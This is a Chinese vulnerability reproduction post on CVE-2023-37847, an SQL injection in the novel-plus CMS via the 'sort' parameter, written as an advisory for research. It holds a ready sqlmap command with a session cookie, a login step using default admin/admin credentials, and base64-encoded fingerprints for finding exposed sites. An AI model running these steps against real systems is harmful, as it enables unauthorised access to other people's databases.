简介
novel-plus 是一个多端(PC、WAP)阅读,功能完善的原创文学 CMS 系统。由前台门户系统、作家后台管理系统、平台后台管理系统和爬虫管理系统等多个子系统构成,包括小说推荐、作品检索、小说排行、小说阅读、小说评论、会员中心、作家专区等功能,支持自定义多模版、可拓展的多种小说内容存储方式(内置数据库分表存储和 TXT 文本存储)、阅读主题切换、多爬虫源自动采集和更新数据、会员充值、订阅模式、新闻发布和实时统计报表。
漏洞描述
novel-plus 3.6.2版本存在SQL注入漏洞,该漏洞源于文件/common/dict/list?sort=sleep(1)&limit=8&offset=1存在问题,对参数sort的操作会导致sql注入。攻击者可利用该漏洞执行非法SQL命令。
影响版本
novel-plus ≤ 3.6.2
漏洞复现
漏洞路由:/common/dict/list
漏洞参数:sort
1.默认账户密码“admin/admin”登录后台,获取管理员cookie
2.sqlmap命令
python3
sqlmap.py -u
"http://xxx.xxx.xxx/common/dict/list?sort=1&limit=10&offset=0&type="
--cookie
"JSESSIONID=b8f26ee3-4f75-4086-8c61-2bfe4ab47a77"
-p
"sort"
--level
5
参考链接
https:
/
/nvd.nist.gov/vuln
/detail/
CVE-
2023
-
37847
https:
/
/github.com/
KingBangQ/CVE-
2023
-
37847
/blob/main/README.md
https:
/
/github.com/
201206030
/novel-plu
前台
Ym9keT0i5bCP6K+057K+5ZOB5bGLLOWwj+ivtCzlsI/or7RDTVMs5Y6f5Yib5paH5a2m57O757ufLOW8gOa6kOWwj+ivtOezu+e7nyzlhY3otLnlsI/or7Tlu7rnq5nnqIvluo8i
后台
Ym9keT0iPGgxPuWwj+ivtOeyvuWTgeWxi+WQjuWPsOeZu+W9lTwvaDE+Ig==
原文始发于微信公众号(不够安全):CVE-2023-37847:novel-plus(小说精品屋-plus)CMS后台SQL注入 附复现过程
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论